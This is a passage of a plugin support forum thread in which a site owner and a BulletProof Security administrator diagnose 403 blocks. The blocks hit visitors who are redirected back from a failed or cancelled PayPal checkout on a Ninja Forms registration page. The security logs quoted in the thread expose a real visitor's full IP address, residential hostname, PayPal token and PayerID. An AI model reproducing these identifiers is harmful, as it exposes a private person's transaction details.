Ninja Forms – 403 error

Home Forums BulletProof Security Free Ninja Forms – 403 error

This topic contains 24 replies, has 2 voices, and was last updated by  Rob B 7 months, 1 week ago.

Viewing 15 posts - 1 through 15 (of 25 total)
  • Author
    Posts
  • #36916

    Rob B
    Participant

    Website is using Ninja Forms with PayPal Express.  Most purchases go through but when an error occurs then the person is blocked from the website.

    [403 GET Request: March 2, 2019 3:24 am]
    BPS: 3.3
    WP: 5.0.3
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 47.xx.xx.xx
    Host Name: 047-024-192-055.res.spectrum.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: https://www.paypal.com/webscr?cmd=_express-checkout&token=EC-9xxxxxxxxxxxxxT&useraction=commit
    REQUEST_URI: /art/art-in-the-park-artist-registration-apr-13-2019/?nf_resume=55&nfpe_checkout=success&token=EC-9T124165M1687513T&PayerID=G5GG5RGDMVXAN
    QUERY_STRING: nf_resume=55&nfpe_checkout=success&token=EC-9T124165M1687513T&PayerID=G5GG5RGDMVXAN
    HTTP_USER_AGENT: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G935A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.105 Mobile Safari/537.36
    #36919

    AITpro Admin
    Keymaster

    The way BPS security features/rules work is that if BPS is blocking something then it will always block whatever is being blocked consistently until a fix/solution is created.  BPS does not intermittently block things because that is not how the security rules work.  In other words, it is an “all or nothing” thing.  So either the problem is occurring because of things that do cause intermittent problems > php memory/cache/caching plugins/CDN’s/VPN’s/Proxy’s/Load Balancers/Host server problems (new security measures added on Host server (Mod Security, etc.), DNS server/DNS configuration problem, MySQL server timeout, server overloaded, etc.), /Browser problems (corrupt cache, Sessions, Cookies, add-on, extension)/ISP (connectivity)/CloudFlare, Incapsula, etc.  Or what appears to be a failed/blocked purchase is not really a failed/blocked purchase.  Or the problem is specific to mobile devices > The 403 error shows that the User Agent is a mobile device (Linux; Android 8.0.0; SAMSUNG-SM-G935A).  Or you have Mod Security enabled in you web host control panel and Mod Security is blocking mobile devices and BPS Security Logging is logging that Mod Security 403 error.  Or of course this could be a bot or spammer/hacker that should be blocked and not a failed transaction/purchase.

    Post a link/URL to your website so I can run some tests using a mobile device to see if the problem is isolated to mobile devices.

    #36922

    AITpro Admin
    Keymaster

    The static IP address:  47.24.192.55 in the Security Log entry is for a website on Spectrum ISP.  That is a bit odd since the User Agent shows that the Request was made by a Mobile Device.  Is the IP address your website IP address on Spectrum?

    #36923

    Rob B
    Participant

    URL to website

    https://steelvilleartscouncil.org/art/

    Their ISP is on Spectrum and they tried a desktop then went to their phone to try to fill out the form.

    The phone was using the Spectrum WiFi

    They were a legitimate user.  They filled out a registration form that required payment from PayPal.  PayPal showed an error (unknown what error) then when they were directed back to the site they were blocked..

    This has happened 3 or 4 times in the last 2 months.  Just now was able to get someone to walk me through their actions and resulting errors.  So I know the errors are the ones for this particular user.

    Below is the log file that is associated with the user.

    [403 GET Request: March 2, 2019 3:24 am]
    BPS: 3.3
    WP: 5.0.3
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 47.24.192.55
    Host Name: 047-024-192-055.res.spectrum.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: https://www.paypal.com/webscr?cmd=_express-checkout&token=EC-9xxxxxxxxxxxxxT&useraction=commit
    REQUEST_URI: /art/art-in-the-park-artist-registration-apr-13-2019/?nf_resume=55&nfpe_checkout=success&token=EC-9T124165M1687513T&PayerID=G5GG5RGDMVXAN
    QUERY_STRING: nf_resume=55&nfpe_checkout=success&token=EC-9T124165M1687513T&PayerID=G5GG5RGDMVXAN
    HTTP_USER_AGENT: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G935A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.105 Mobile Safari/537.36
    
    [403 GET Request: March 2, 2019 3:26 am]
    BPS: 3.3
    WP: 5.0.3
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 47.24.192.55
    Host Name: 047-024-192-055.res.spectrum.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /art/
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G935A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.105 Mobile Safari/537.36
    
    [403 GET Request: March 2, 2019 3:26 am]
    BPS: 3.3
    WP: 5.0.3
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 47.24.192.55
    Host Name: 047-024-192-055.res.spectrum.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER:
    REQUEST_URI: /art/
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G935A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.105 Mobile Safari/537.36
    
    [403 GET Request: March 2, 2019 3:27 am]
    BPS: 3.3
    WP: 5.0.3
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 47.24.192.55
    Host Name: 047-024-192-055.res.spectrum.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: https://www.google.com/
    REQUEST_URI: /art/category/events/
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G935A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.105 Mobile Safari/537.36
    
    [403 GET Request: March 2, 2019 3:27 am]
    BPS: 3.3
    WP: 5.0.3
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 47.24.192.55
    Host Name: 047-024-192-055.res.spectrum.com
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: https://www.google.com/
    REQUEST_URI: /art/for-artists/call-for-artists/
    QUERY_STRING:
    HTTP_USER_AGENT: Mozilla/5.0 (Linux; Android 8.0.0; SAMSUNG-SM-G935A) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.105 Mobile Safari/537.36
    #36924

    Rob B
    Participant

    Would this rule help?

    # Example 3: Whitelist PayPal IPN API Script POST Requests
    RewriteCond %{REQUEST_URI} !^.*/ipn_handler.php [NC]
    RewriteRule ^(.*)$ - [F]
    #36925

    AITpro Admin
    Keymaster

    That rule would only work if the exact specific name of your IPN handler file/script was that exact file name.  If some payment transactions are going through then it is not a problem with whitelisting a particular file.  BPS works in a way that is “all or nothing”.  ie all PayPal transactions would fail or be blocked or none of them would be.  There is no in-between since that is not the way BPS is designed or the way htaccess security rules work.  Static htaccess security rules do not work intermittently since they are rules that your server uses to process things.  They either consistently block something 100% of the time or not at all.  So you have some sort of intermittent problem that must be caused by some other problem.  My gut is telling me that when an error occurs on PayPal and the user is sent back to your website then something in the redirect from PayPal back to your website triggers a 403 error.  It would be nice to know what that PayPal error is.  I am checking/testing your site now and will let you know if I find anything.

    #36926

    Rob B
    Participant

    I agree with your gut feeling.

    My gut is telling me that when an error occurs on PayPal and the user is sent back to your website then something in the redirect from PayPal back to your website triggers a 403 error.

    The user reported that the 403 started after the PayPal error.  I am guessing they got a redirect that triggered the issue.

     

    #36927

    AITpro Admin
    Keymaster

    I was able to successfully reproduce the problem by filling out your Registration form and cancelling the PayPal transaction.  So now I am analyzing why the PayPal redirect back to your site is causing the 403 error.  Will post a reply when I have figured that out.

    #36928

    Rob B
    Participant

    Could not see the error in PayPal as the transaction was not recorded.

    #36929

    Rob B
    Participant

    Is this your entry?

    [403 GET Request: March 4, 2019 7:55 pm]
    BPS: 3.3
    WP: 5.1
    Event Code: BFHS - Blocked/Forbidden Hacker or Spammer
    Solution: N/A - Hacker/Spammer Blocked/Forbidden
    REMOTE_ADDR: 108.213.94.121
    Host Name: 108-213-94-121.lightspeed.irvnca.sbcglobal.net
    SERVER_PROTOCOL: HTTP/1.1
    HTTP_CLIENT_IP:
    HTTP_FORWARDED:
    HTTP_X_FORWARDED_FOR:
    HTTP_X_CLUSTER_CLIENT_IP:
    REQUEST_METHOD: GET
    HTTP_REFERER: https://www.paypal.com/webscr?cmd=_express-checkout&token=EC-4VL960529M7110255&useraction=commit
    REQUEST_URI: /art/art-in-the-park-artist-registration-apr-13-2019/?nf_resume=55&nfpe_checkout=cancel&token=EC-4VL960529M7110255&country.x=US&locale.x=en_US
    QUERY_STRING: nf_resume=55&nfpe_checkout=cancel&token=EC-4VL960529M7110255&country.x=US&locale.x=en_US
    HTTP_USER_AGENT: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36
    #36930

    AITpro Admin
    Keymaster

    Ok so here is where we are at > there is nothing in the Query String of the post back to your website that BPS would block.  So what I need you to do now is to login to PayPal and find your “Take customers to this URL when they cancel their checkout” settings and then post the URL that you see.  I suspect you may be trying to do some sort of odd redirect that is causing the 403 error because the redirect is seen as an RFI hacking attempt.  I could be wrong, but that is the first possibility to eliminate.  The other possibilities are that you are doing some sort of forwarding or redirects somewhere else that are causing the URL to be redirected more than once.

    #36931

    AITpro Admin
    Keymaster

    Yes, that was the test PayPal transaction that I did. The Security Log entry does not really tell you what the root problem is because the problem is happening outside of your website or some odd control panel setting or some fubar htaccess redirect code or your PayPal settings are fubar.

    #36932

    Rob B
    Participant

    Return url;

    https://steelvilleartscouncil.org/art/thank-you-for-your-purchase/

    So nothing there, also this is for successful payments.

    Looking more.

    #36933

    AITpro Admin
    Keymaster

    Please post the PayPal URL for failed or cancelled transactions. The BPS 403 error is “after the fact” since the problem is occurring during the redirect back from PayPal on errors or failed transactions. Successful PayPal transactions appear to be fine. So yeah that is where you need to start troubleshooting this PayPal settings problem. My guess is that you have some sort of RFI URL redirect issue going on.

    #36934

    Rob B
    Participant

    Yes we are on the same page.

    I will be looking for the failed transaction redirect.

Viewing 15 posts - 1 through 15 (of 25 total)

You must be logged in to reply to this topic.